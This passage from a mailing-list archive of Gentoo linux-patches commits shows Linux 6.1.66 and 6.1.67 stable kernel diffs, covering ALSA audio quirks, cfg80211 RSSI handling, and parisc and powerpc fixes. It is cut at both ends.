+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -283,6 +283,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "M6500RC"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "E1504FA"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 9f59518005a5f..840bbe991cd3a 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -1871,6 +1871,11 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 
+ 	tx->dev = dev;
+ 
++	/* Set active_decimator default value */
++	tx->active_decimator[TX_MACRO_AIF1_CAP] = -1;
++	tx->active_decimator[TX_MACRO_AIF2_CAP] = -1;
++	tx->active_decimator[TX_MACRO_AIF3_CAP] = -1;
++
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(tx->mclk, MCLK_FREQ);
+ 	clk_set_rate(tx->npl, MCLK_FREQ);
+diff --git a/sound/soc/codecs/wm_adsp.c b/sound/soc/codecs/wm_adsp.c
+index 8a2e9771bb50e..2cfca78f0401f 100644
+--- a/sound/soc/codecs/wm_adsp.c
++++ b/sound/soc/codecs/wm_adsp.c
+@@ -1401,12 +1401,12 @@ static int wm_adsp_buffer_populate(struct wm_adsp_compr_buf *buf)
+ 		ret = wm_adsp_buffer_read(buf, caps->region_defs[i].base_offset,
+ 					  &region->base_addr);
+ 		if (ret < 0)
+-			return ret;
++			goto err;
+ 
+ 		ret = wm_adsp_buffer_read(buf, caps->region_defs[i].size_offset,
+ 					  &offset);
+ 		if (ret < 0)
+-			return ret;
++			goto err;
+ 
+ 		region->cumulative_size = offset;
+ 
+@@ -1417,6 +1417,10 @@ static int wm_adsp_buffer_populate(struct wm_adsp_compr_buf *buf)
+ 	}
+ 
+ 	return 0;
++
++err:
++	kfree(buf->regions);
++	return ret;
+ }
+ 
+ static void wm_adsp_buffer_clear(struct wm_adsp_compr_buf *buf)
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 96fd9095e544b..6364d9be28fbb 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -674,6 +674,20 @@ static int fsl_sai_hw_params(struct snd_pcm_substream *substream,
+ 			   FSL_SAI_CR3_TRCE_MASK,
+ 			   FSL_SAI_CR3_TRCE((dl_cfg[dl_cfg_idx].mask[tx] & trce_mask)));
+ 
++	/*
++	 * When the TERE and FSD_MSTR enabled before configuring the word width
++	 * There will be no frame sync clock issue, because word width impact
++	 * the generation of frame sync clock.
++	 *
++	 * TERE enabled earlier only for i.MX8MP case for the hardware limitation,
++	 * We need to disable FSD_MSTR before configuring word width, then enable
++	 * FSD_MSTR bit for this specific case.
++	 */
++	if (sai->soc_data->mclk_with_tere && sai->mclk_direction_output &&
++	    !sai->is_consumer_mode)
++		regmap_update_bits(sai->regmap, FSL_SAI_xCR4(tx, ofs),
++				   FSL_SAI_CR4_FSD_MSTR, 0);
++
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCR4(tx, ofs),
+ 			   FSL_SAI_CR4_SYWD_MASK | FSL_SAI_CR4_FRSZ_MASK |
+ 			   FSL_SAI_CR4_CHMOD_MASK,
+@@ -681,6 +695,13 @@ static int fsl_sai_hw_params(struct snd_pcm_substream *substream,
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCR5(tx, ofs),
+ 			   FSL_SAI_CR5_WNW_MASK | FSL_SAI_CR5_W0W_MASK |
+ 			   FSL_SAI_CR5_FBT_MASK, val_cr5);
++
++	/* Enable FSD_MSTR after configuring word width */
++	if (sai->soc_data->mclk_with_tere && sai->mclk_direction_output &&
++	    !sai->is_consumer_mode)
++		regmap_update_bits(sai->regmap, FSL_SAI_xCR4(tx, ofs),
++				   FSL_SAI_CR4_FSD_MSTR, FSL_SAI_CR4_FSD_MSTR);
++
+ 	regmap_write(sai->regmap, FSL_SAI_xMR(tx),
+ 		     ~0UL - ((1 << min(channels, slots)) - 1));
+ 
+diff --git a/sound/usb/mixer_quirks.c b/sound/usb/mixer_quirks.c
+index ab0d459f42715..1f32e3ae3aa31 100644
+--- a/sound/usb/mixer_quirks.c
++++ b/sound/usb/mixer_quirks.c
+@@ -2978,6 +2978,7 @@ static int snd_bbfpro_controls_create(struct usb_mixer_interface *mixer)
+ #define SND_DJM_850_IDX		0x2
+ #define SND_DJM_900NXS2_IDX	0x3
+ #define SND_DJM_750MK2_IDX	0x4
++#define SND_DJM_450_IDX		0x5
+ 
+ 
+ #define SND_DJM_CTL(_name, suffix, _default_value, _windex) { \
+@@ -3108,6 +3109,31 @@ static const struct snd_djm_ctl snd_djm_ctls_250mk2[] = {
+ };
+ 
+ 
++// DJM-450
++static const u16 snd_djm_opts_450_cap1[] = {
++	0x0103, 0x0100, 0x0106, 0x0107, 0x0108, 0x0109, 0x010d, 0x010a };
++
++static const u16 snd_djm_opts_450_cap2[] = {
++	0x0203, 0x0200, 0x0206, 0x0207, 0x0208, 0x0209, 0x020d, 0x020a };
++
++static const u16 snd_djm_opts_450_cap3[] = {
++	0x030a, 0x0311, 0x0312, 0x0307, 0x0308, 0x0309, 0x030d };
++
++static const u16 snd_djm_opts_450_pb1[] = { 0x0100, 0x0101, 0x0104 };
++static const u16 snd_djm_opts_450_pb2[] = { 0x0200, 0x0201, 0x0204 };
++static const u16 snd_djm_opts_450_pb3[] = { 0x0300, 0x0301, 0x0304 };
++
++static const struct snd_djm_ctl snd_djm_ctls_450[] = {
++	SND_DJM_CTL("Capture Level", cap_level, 0, SND_DJM_WINDEX_CAPLVL),
++	SND_DJM_CTL("Ch1 Input",   450_cap1, 2, SND_DJM_WINDEX_CAP),
++	SND_DJM_CTL("Ch2 Input",   450_cap2, 2, SND_DJM_WINDEX_CAP),
++	SND_DJM_CTL("Ch3 Input",   450_cap3, 0, SND_DJM_WINDEX_CAP),
++	SND_DJM_CTL("Ch1 Output",   450_pb1, 0, SND_DJM_WINDEX_PB),
++	SND_DJM_CTL("Ch2 Output",   450_pb2, 1, SND_DJM_WINDEX_PB),
++	SND_DJM_CTL("Ch3 Output",   450_pb3, 2, SND_DJM_WINDEX_PB)
++};
++
++
+ // DJM-750
+ static const u16 snd_djm_opts_750_cap1[] = {
+ 	0x0101, 0x0103, 0x0106, 0x0107, 0x0108, 0x0109, 0x010a, 0x010f };
+@@ -3203,6 +3229,7 @@ static const struct snd_djm_device snd_djm_devices[] = {
+ 	[SND_DJM_850_IDX] = SND_DJM_DEVICE(850),
+ 	[SND_DJM_900NXS2_IDX] = SND_DJM_DEVICE(900nxs2),
+ 	[SND_DJM_750MK2_IDX] = SND_DJM_DEVICE(750mk2),
++	[SND_DJM_450_IDX] = SND_DJM_DEVICE(450),
+ };
+ 
+ 
+@@ -3449,6 +3476,9 @@ int snd_usb_mixer_apply_create_quirk(struct usb_mixer_interface *mixer)
+ 	case USB_ID(0x2b73, 0x0017): /* Pioneer DJ DJM-250MK2 */
+ 		err = snd_djm_controls_create(mixer, SND_DJM_250MK2_IDX);
+ 		break;
++	case USB_ID(0x2b73, 0x0013): /* Pioneer DJ DJM-450 */
++		err = snd_djm_controls_create(mixer, SND_DJM_450_IDX);
++		break;
+ 	case USB_ID(0x08e4, 0x017f): /* Pioneer DJ DJM-750 */
+ 		err = snd_djm_controls_create(mixer, SND_DJM_750_IDX);
+ 		break;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-11 14:20 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-11 14:20 UTC (permalink / raw
  To: gentoo-commits

commit:     38a5712dd639ae25005f19ae1d210b2fe87ecad6
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Dec 11 14:19:59 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Dec 11 14:19:59 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=38a5712d

Linux patch 6.1.67

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |   4 ++
 1066_linux-6.1.67.patch | 122 ++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 126 insertions(+)

diff --git a/0000_README b/0000_README
index 37486bab..5f228fc4 100644
--- a/0000_README
+++ b/0000_README
@@ -307,6 +307,10 @@ Patch:  1065_linux-6.1.66.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.66
 
+Patch:  1066_linux-6.1.67.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.67
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1066_linux-6.1.67.patch b/1066_linux-6.1.67.patch
new file mode 100644
index 00000000..38a86e85
--- /dev/null
+++ b/1066_linux-6.1.67.patch
@@ -0,0 +1,122 @@
+diff --git a/Makefile b/Makefile
+index 5d7e995d686c8..c27600b90cad2 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 66
++SUBLEVEL = 67
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index ee980965a7cfb..e1accacc6f233 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -297,7 +297,6 @@ struct cfg80211_cqm_config {
+ 	u32 rssi_hyst;
+ 	s32 last_rssi_event_value;
+ 	enum nl80211_cqm_rssi_threshold_event last_rssi_event_type;
+-	bool use_range_api;
+ 	int n_rssi_thresholds;
+ 	s32 rssi_thresholds[];
+ };
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index 42c858219b341..b19b5acfaf3a9 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -12574,6 +12574,10 @@ static int cfg80211_cqm_rssi_update(struct cfg80211_registered_device *rdev,
+ 	int i, n, low_index;
+ 	int err;
+ 
++	/* RSSI reporting disabled? */
++	if (!cqm_config)
++		return rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
++
+ 	/*
+ 	 * Obtain current RSSI value if possible, if not and no RSSI threshold
+ 	 * event has been received yet, we should receive an event after a
+@@ -12648,6 +12652,18 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	    wdev->iftype != NL80211_IFTYPE_P2P_CLIENT)
+ 		return -EOPNOTSUPP;
+ 
++	if (n_thresholds <= 1 && rdev->ops->set_cqm_rssi_config) {
++		if (n_thresholds == 0 || thresholds[0] == 0) /* Disabling */
++			return rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
++
++		return rdev_set_cqm_rssi_config(rdev, dev,
++						thresholds[0], hysteresis);
++	}
++
++	if (!wiphy_ext_feature_isset(&rdev->wiphy,
++				     NL80211_EXT_FEATURE_CQM_RSSI_LIST))
++		return -EOPNOTSUPP;
++
+ 	if (n_thresholds == 1 && thresholds[0] == 0) /* Disabling */
+ 		n_thresholds = 0;
+ 
+@@ -12655,20 +12671,6 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 	old = rcu_dereference_protected(wdev->cqm_config,
+ 					lockdep_is_held(&wdev->mtx));
+ 
+-	/* if already disabled just succeed */
+-	if (!n_thresholds && !old)
+-		return 0;
+-
+-	if (n_thresholds > 1) {
+-		if (!wiphy_ext_feature_isset(&rdev->wiphy,
+-					     NL80211_EXT_FEATURE_CQM_RSSI_LIST) ||
+-		    !rdev->ops->set_cqm_rssi_range_config)
+-			return -EOPNOTSUPP;
+-	} else {
+-		if (!rdev->ops->set_cqm_rssi_config)
+-			return -EOPNOTSUPP;
+-	}
+-
+ 	if (n_thresholds) {
+ 		cqm_config = kzalloc(struct_size(cqm_config, rssi_thresholds,
+ 						 n_thresholds),
+@@ -12683,26 +12685,13 @@ static int nl80211_set_cqm_rssi(struct genl_info *info,
+ 		memcpy(cqm_config->rssi_thresholds, thresholds,
+ 		       flex_array_size(cqm_config, rssi_thresholds,
+ 				       n_thresholds));
+-		cqm_config->use_range_api = n_thresholds > 1 ||
+-					    !rdev->ops->set_cqm_rssi_config;
+ 
+ 		rcu_assign_pointer(wdev->cqm_config, cqm_config);
+-
+-		if (cqm_config->use_range_api)
+-			err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
+-		else
+-			err = rdev_set_cqm_rssi_config(rdev, dev,
+-						       thresholds[0],
+-						       hysteresis);
+ 	} else {
+ 		RCU_INIT_POINTER(wdev->cqm_config, NULL);
+-		/* if enabled as range also disable via range */
+-		if (old->use_range_api)
+-			err = rdev_set_cqm_rssi_range_config(rdev, dev, 0, 0);
+-		else
+-			err = rdev_set_cqm_rssi_config(rdev, dev, 0, 0);
+ 	}
+ 
++	err = cfg80211_cqm_rssi_update(rdev, dev, cqm_config);
+ 	if (err) {
+ 		rcu_assign_pointer(wdev->cqm_config, old);
+ 		kfree_rcu(cqm_config, rcu_head);
+@@ -18769,11 +18758,10 @@ void cfg80211_cqm_rssi_notify_work(struct wiphy *wiphy, struct wiphy_work *work)
+ 	wdev_lock(wdev);
+ 	cqm_config = rcu_dereference_protected(wdev->cqm_config,
+ 					       lockdep_is_held(&wdev->mtx));
+-	if (!cqm_config)
++	if (!wdev->cqm_config)
+ 		goto unlock;
+ 
+-	if (cqm_config->use_range_api)
+-		cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
++	cfg80211_cqm_rssi_update(rdev, wdev->netdev, cqm_config);
+ 
+ 	rssi_level = cqm_config->last_rssi_event_value;
+ 	rssi_event = cqm_config->last_rssi_event_type;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-08 10:55 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-08 10:55 UTC (permalink / raw
  To: gentoo-commits

commit:     bd4a200f012c938193a86da7d829c88acee96bda
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Dec  8 10:55:00 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Dec  8 10:55:00 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=bd4a200f

Linux patch 6.1.66

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1065_linux-6.1.66.patch | 4837 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4841 insertions(+)

diff --git a/0000_README b/0000_README
index 08e6f2e1..37486bab 100644
--- a/0000_README
+++ b/0000_README
@@ -303,6 +303,10 @@ Patch:  1064_linux-6.1.65.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.65
 
+Patch:  1065_linux-6.1.66.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.66
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1065_linux-6.1.66.patch b/1065_linux-6.1.66.patch
new file mode 100644
index 00000000..eae06551
--- /dev/null
+++ b/1065_linux-6.1.66.patch
@@ -0,0 +1,4837 @@
+diff --git a/Makefile b/Makefile
+index 1646e334a647f..5d7e995d686c8 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 65
++SUBLEVEL = 66
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/xen/enlighten.c b/arch/arm/xen/enlighten.c
+index d12fdb9c05a89..eace3607fef41 100644
+--- a/arch/arm/xen/enlighten.c
++++ b/arch/arm/xen/enlighten.c
+@@ -204,7 +204,7 @@ static void xen_power_off(void)
+ 
+ static irqreturn_t xen_arm_callback(int irq, void *arg)
+ {
+-	xen_hvm_evtchn_do_upcall();
++	xen_evtchn_do_upcall();
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/arch/parisc/include/asm/alternative.h b/arch/parisc/include/asm/alternative.h
+index 1ed45fd085d3b..1eb488f25b838 100644
+--- a/arch/parisc/include/asm/alternative.h
++++ b/arch/parisc/include/asm/alternative.h
+@@ -34,7 +34,8 @@ void apply_alternatives(struct alt_instr *start, struct alt_instr *end,
+ 
+ /* Alternative SMP implementation. */
+ #define ALTERNATIVE(cond, replacement)		"!0:"	\
+-	".section .altinstructions, \"aw\"	!"	\
++	".section .altinstructions, \"a\"	!"	\
++	".align 4				!"	\
+ 	".word (0b-4-.)				!"	\
+ 	".hword 1, " __stringify(cond) "	!"	\
+ 	".word " __stringify(replacement) "	!"	\
+@@ -44,7 +45,8 @@ void apply_alternatives(struct alt_instr *start, struct alt_instr *end,
+ 
+ /* to replace one single instructions by a new instruction */
+ #define ALTERNATIVE(from, to, cond, replacement)\
+-	.section .altinstructions, "aw"	!	\
++	.section .altinstructions, "a"	!	\
++	.align 4			!	\
+ 	.word (from - .)		!	\
+ 	.hword (to - from)/4, cond	!	\
+ 	.word replacement		!	\
+@@ -52,7 +54,8 @@ void apply_alternatives(struct alt_instr *start, struct alt_instr *end,
+ 
+ /* to replace multiple instructions by new code */
+ #define ALTERNATIVE_CODE(from, num_instructions, cond, new_instr_ptr)\
+-	.section .altinstructions, "aw"	!	\
++	.section .altinstructions, "a"	!	\
++	.align 4			!	\
+ 	.word (from - .)		!	\
+ 	.hword -num_instructions, cond	!	\
+ 	.word (new_instr_ptr - .)	!	\
+diff --git a/arch/parisc/include/asm/assembly.h b/arch/parisc/include/asm/assembly.h
+index 75677b526b2bb..74d17d7e759da 100644
+--- a/arch/parisc/include/asm/assembly.h
++++ b/arch/parisc/include/asm/assembly.h
+@@ -574,6 +574,7 @@
+ 	 */
+ #define ASM_EXCEPTIONTABLE_ENTRY(fault_addr, except_addr)	\
+ 	.section __ex_table,"aw"			!	\
++	.align 4					!	\
+ 	.word (fault_addr - .), (except_addr - .)	!	\
+ 	.previous
+ 
+diff --git a/arch/parisc/include/asm/bug.h b/arch/parisc/include/asm/bug.h
+index 4b6d60b941247..b9cad0bb4461b 100644
+--- a/arch/parisc/include/asm/bug.h
++++ b/arch/parisc/include/asm/bug.h
+@@ -28,13 +28,15 @@
+ 	do {								\
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+-			     "\t.pushsection __bug_table,\"aw\"\n"	\
++			     "\t.pushsection __bug_table,\"a\"\n"	\
++			     "\t.align %4\n"				\
+ 			     "2:\t" ASM_WORD_INSN "1b, %c0\n"		\
+-			     "\t.short %c1, %c2\n"			\
+-			     "\t.org 2b+%c3\n"				\
++			     "\t.short %1, %2\n"			\
++			     "\t.blockz %3-2*%4-2*2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (__FILE__), "i" (__LINE__),	\
+-			     "i" (0), "i" (sizeof(struct bug_entry)) ); \
++			     "i" (0), "i" (sizeof(struct bug_entry)),	\
++			     "i" (sizeof(long)) );			\
+ 		unreachable();						\
+ 	} while(0)
+ 
+@@ -51,27 +53,31 @@
+ 	do {								\
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+-			     "\t.pushsection __bug_table,\"aw\"\n"	\
++			     "\t.pushsection __bug_table,\"a\"\n"	\
++			     "\t.align %4\n"				\
+ 			     "2:\t" ASM_WORD_INSN "1b, %c0\n"		\
+-			     "\t.short %c1, %c2\n"			\
+-			     "\t.org 2b+%c3\n"				\
++			     "\t.short %1, %2\n"			\
++			     "\t.blockz %3-2*%4-2*2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (__FILE__), "i" (__LINE__),	\
+ 			     "i" (BUGFLAG_WARNING|(flags)),		\
+-			     "i" (sizeof(struct bug_entry)) );		\
++			     "i" (sizeof(struct bug_entry)),		\
++			     "i" (sizeof(long)) );			\
+ 	} while(0)
+ #else
+ #define __WARN_FLAGS(flags)						\
+ 	do {								\
+ 		asm volatile("\n"					\
+ 			     "1:\t" PARISC_BUG_BREAK_ASM "\n"		\
+-			     "\t.pushsection __bug_table,\"aw\"\n"	\
++			     "\t.pushsection __bug_table,\"a\"\n"	\
++			     "\t.align %2\n"				\
+ 			     "2:\t" ASM_WORD_INSN "1b\n"		\
+-			     "\t.short %c0\n"				\
+-			     "\t.org 2b+%c1\n"				\
++			     "\t.short %0\n"				\
++			     "\t.blockz %1-%2-2\n"			\
+ 			     "\t.popsection"				\
+ 			     : : "i" (BUGFLAG_WARNING|(flags)),		\
+-			     "i" (sizeof(struct bug_entry)) );		\
++			     "i" (sizeof(struct bug_entry)),		\
++			     "i" (sizeof(long)) );			\
+ 	} while(0)
+ #endif
+ 
+diff --git a/arch/parisc/include/asm/jump_label.h b/arch/parisc/include/asm/jump_label.h
+index af2a598bc0f81..94428798b6aa6 100644
+--- a/arch/parisc/include/asm/jump_label.h
++++ b/arch/parisc/include/asm/jump_label.h
+@@ -15,10 +15,12 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 	asm_volatile_goto("1:\n\t"
+ 		 "nop\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
++		 ".align %1\n\t"
+ 		 ".word 1b - ., %l[l_yes] - .\n\t"
+ 		 __stringify(ASM_ULONG_INSN) " %c0 - .\n\t"
+ 		 ".popsection\n\t"
+-		 : :  "i" (&((char *)key)[branch]) :  : l_yes);
++		 : : "i" (&((char *)key)[branch]), "i" (sizeof(long))
++		 : : l_yes);
+ 
+ 	return false;
+ l_yes:
+@@ -30,10 +32,12 @@ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool
+ 	asm_volatile_goto("1:\n\t"
+ 		 "b,n %l[l_yes]\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
++		 ".align %1\n\t"
+ 		 ".word 1b - ., %l[l_yes] - .\n\t"
+ 		 __stringify(ASM_ULONG_INSN) " %c0 - .\n\t"
+ 		 ".popsection\n\t"
+-		 : :  "i" (&((char *)key)[branch]) :  : l_yes);
++		 : : "i" (&((char *)key)[branch]), "i" (sizeof(long))
++		 : : l_yes);
+ 
+ 	return false;
+ l_yes:
+diff --git a/arch/parisc/include/asm/ldcw.h b/arch/parisc/include/asm/ldcw.h
+index 10a061d6899cd..883a9ddbb6770 100644
+--- a/arch/parisc/include/asm/ldcw.h
++++ b/arch/parisc/include/asm/ldcw.h
+@@ -56,7 +56,7 @@
+ })
+ 
+ #ifdef CONFIG_SMP
+-# define __lock_aligned __section(".data..lock_aligned")
++# define __lock_aligned __section(".data..lock_aligned") __aligned(16)
+ #endif
+ 
+ #endif /* __PARISC_LDCW_H */
+diff --git a/arch/parisc/include/asm/uaccess.h b/arch/parisc/include/asm/uaccess.h
+index 2bf660eabe421..4165079898d9e 100644
+--- a/arch/parisc/include/asm/uaccess.h
++++ b/arch/parisc/include/asm/uaccess.h
+@@ -41,6 +41,7 @@ struct exception_table_entry {
+ 
+ #define ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr )\
+ 	".section __ex_table,\"aw\"\n"			   \
++	".align 4\n"					   \
+ 	".word (" #fault_addr " - .), (" #except_addr " - .)\n\t" \
+ 	".previous\n"
+ 
+diff --git a/arch/parisc/include/uapi/asm/errno.h b/arch/parisc/include/uapi/asm/errno.h
+index 87245c584784e..8d94739d75c67 100644
+--- a/arch/parisc/include/uapi/asm/errno.h
++++ b/arch/parisc/include/uapi/asm/errno.h
+@@ -75,7 +75,6 @@
+ 
+ /* We now return you to your regularly scheduled HPUX. */
+ 
+-#define ENOSYM		215	/* symbol does not exist in executable */
+ #define	ENOTSOCK	216	/* Socket operation on non-socket */
+ #define	EDESTADDRREQ	217	/* Destination address required */
+ #define	EMSGSIZE	218	/* Message too long */
+@@ -101,7 +100,6 @@
+ #define	ETIMEDOUT	238	/* Connection timed out */
+ #define	ECONNREFUSED	239	/* Connection refused */
+ #define	EREFUSED	ECONNREFUSED	/* for HP's NFS apparently */
+-#define	EREMOTERELEASE	240	/* Remote peer released connection */
+ #define	EHOSTDOWN	241	/* Host is down */
+ #define	EHOSTUNREACH	242	/* No route to host */
+ 
+diff --git a/arch/parisc/kernel/vmlinux.lds.S b/arch/parisc/kernel/vmlinux.lds.S
+index 2769eb991f58d..ad3a3239ea74b 100644
+--- a/arch/parisc/kernel/vmlinux.lds.S
++++ b/arch/parisc/kernel/vmlinux.lds.S
+@@ -131,6 +131,7 @@ SECTIONS
+ 	RO_DATA(8)
+ 
+ 	/* unwind info */
++	. = ALIGN(4);
+ 	.PARISC.unwind : {
+ 		__start___unwind = .;
+ 		*(.PARISC.unwind)
+diff --git a/arch/powerpc/kernel/fpu.S b/arch/powerpc/kernel/fpu.S
+index f71f2bbd4de64..9854364e599c1 100644
+--- a/arch/powerpc/kernel/fpu.S
++++ b/arch/powerpc/kernel/fpu.S
+@@ -23,6 +23,15 @@
+ #include <asm/feature-fixups.h>
+ 
+ #ifdef CONFIG_VSX
++#define __REST_1FPVSR(n,c,base)						\
++BEGIN_FTR_SECTION							\
++	b	2f;							\
++END_FTR_SECTION_IFSET(CPU_FTR_VSX);					\
++	REST_FPR(n,base);						\
++	b	3f;							\
++2:	REST_VSR(n,c,base);						\
++3:
++
+ #define __REST_32FPVSRS(n,c,base)					\
+ BEGIN_FTR_SECTION							\
+ 	b	2f;							\
+@@ -41,9 +50,11 @@ END_FTR_SECTION_IFSET(CPU_FTR_VSX);					\
+ 2:	SAVE_32VSRS(n,c,base);						\
+ 3:
+ #else
++#define __REST_1FPVSR(n,b,base)		REST_FPR(n, base)
+ #define __REST_32FPVSRS(n,b,base)	REST_32FPRS(n, base)
+ #define __SAVE_32FPVSRS(n,b,base)	SAVE_32FPRS(n, base)
+ #endif
++#define REST_1FPVSR(n,c,base)   __REST_1FPVSR(n,__REG_##c,__REG_##base)
+ #define REST_32FPVSRS(n,c,base) __REST_32FPVSRS(n,__REG_##c,__REG_##base)
+ #define SAVE_32FPVSRS(n,c,base) __SAVE_32FPVSRS(n,__REG_##c,__REG_##base)
+ 
+@@ -67,6 +78,7 @@ _GLOBAL(store_fp_state)
+ 	SAVE_32FPVSRS(0, R4, R3)
+ 	mffs	fr0
+ 	stfd	fr0,FPSTATE_FPSCR(r3)
++	REST_1FPVSR(0, R4, R3)
+ 	blr
+ EXPORT_SYMBOL(store_fp_state)
+ 
+@@ -138,4 +150,5 @@ _GLOBAL(save_fpu)
+ 2:	SAVE_32FPVSRS(0, R4, R6)
+ 	mffs	fr0
+ 	stfd	fr0,FPSTATE_FPSCR(r6)
++	REST_1FPVSR(0, R4, R6)
+ 	blr
+diff --git a/arch/powerpc/kernel/process.c b/arch/powerpc/kernel/process.c
+index 67da147fe34dc..f2cbad5228811 100644
+--- a/arch/powerpc/kernel/process.c
++++ b/arch/powerpc/kernel/process.c
+@@ -1163,11 +1163,11 @@ void kvmppc_save_user_regs(void)
+ 
+ 	usermsr = current->thread.regs->msr;
+ 
++	/* Caller has enabled FP/VEC/VSX/TM in MSR */
+ 	if (usermsr & MSR_FP)
+-		save_fpu(current);
+-
++		__giveup_fpu(current);
+ 	if (usermsr & MSR_VEC)
+-		save_altivec(current);
++		__giveup_altivec(current);
+ 
+ #ifdef CONFIG_PPC_TRANSACTIONAL_MEM
+ 	if (usermsr & MSR_TM) {
+diff --git a/arch/powerpc/kernel/vector.S b/arch/powerpc/kernel/vector.S
+index 5cf64740edb82..99c1e70841ea2 100644
+--- a/arch/powerpc/kernel/vector.S
++++ b/arch/powerpc/kernel/vector.S
+@@ -32,6 +32,7 @@ _GLOBAL(store_vr_state)
+ 	mfvscr	v0
+ 	li	r4, VRSTATE_VSCR
+ 	stvx	v0, r4, r3
++	lvx	v0, 0, r3
+ 	blr
+ EXPORT_SYMBOL(store_vr_state)
+ 
+@@ -108,6 +109,7 @@ _GLOBAL(save_altivec)
+ 	mfvscr	v0
+ 	li	r4,VRSTATE_VSCR
+ 	stvx	v0,r4,r7
++	lvx	v0,0,r7
+ 	blr
+ 
+ #ifdef CONFIG_VSX
+diff --git a/arch/x86/entry/common.c b/arch/x86/entry/common.c
+index 6c2826417b337..93c60c0c9d4a7 100644
+--- a/arch/x86/entry/common.c
++++ b/arch/x86/entry/common.c
+@@ -294,7 +294,7 @@ static void __xen_pv_evtchn_do_upcall(struct pt_regs *regs)
+ 
+ 	inc_irq_stat(irq_hv_callback_count);
+ 
+-	xen_hvm_evtchn_do_upcall();
++	xen_evtchn_do_upcall();
+ 
+ 	set_irq_regs(old_regs);
+ }
+diff --git a/arch/x86/include/asm/kvm-x86-ops.h b/arch/x86/include/asm/kvm-x86-ops.h
+index 2c6698aa218b1..abc07d0045897 100644
+--- a/arch/x86/include/asm/kvm-x86-ops.h
++++ b/arch/x86/include/asm/kvm-x86-ops.h
+@@ -106,6 +106,7 @@ KVM_X86_OP_OPTIONAL(vcpu_blocking)
+ KVM_X86_OP_OPTIONAL(vcpu_unblocking)
+ KVM_X86_OP_OPTIONAL(pi_update_irte)
